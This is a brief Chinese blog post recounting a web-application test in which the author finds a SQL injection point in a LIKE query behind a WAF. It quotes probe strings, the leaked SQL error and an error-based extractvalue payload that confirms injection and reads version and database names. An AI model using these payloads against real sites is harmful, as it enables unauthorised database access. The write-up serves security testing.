AC总结

Sql

01

流程测试点:

登录注册-->修改个人信息-->查询数据#

返回理解

存在不安全字符

1’ and 1=1 --+ 存在不安全字符,后台进行校验,该处存在数据库查询点,有waf对输入进行字符检验。

开始order by判断返回数据类别数量,union语句查询。发现会出现报错提示语句错误并显示出错误语句。

select count(xxxx) as total from xxx inner join xxxxx on xxx = xxxx where xxxx='xxxx and union_adclick.clicktime>='xxxx and xxxx<='2021-07-31 23:59:59' and xxxx like '%1'%' or 1=1 --+

是like模糊查询(不太清楚模糊到哪)

前面是‘% 后面我用%‘闭合,然后存在转码,所以+用空格代替,既然能报错出语句错误,自然想到报错注入,

直接payload

1 %' and(select extractvalue("anything",concat('~',(1))))-- 

回弹显示1,找到注入点,测试几个函数version database,都可以,然后进一步下去还是会有在前面输入语句一样的存在不安全字符,但点已经存在,继续下一步的注入确定是哪些字符被过滤然后进一步细化payload即可

 

posted @ 2021-07-17 10:00  韩扶  阅读(60)  评论(0)    收藏  举报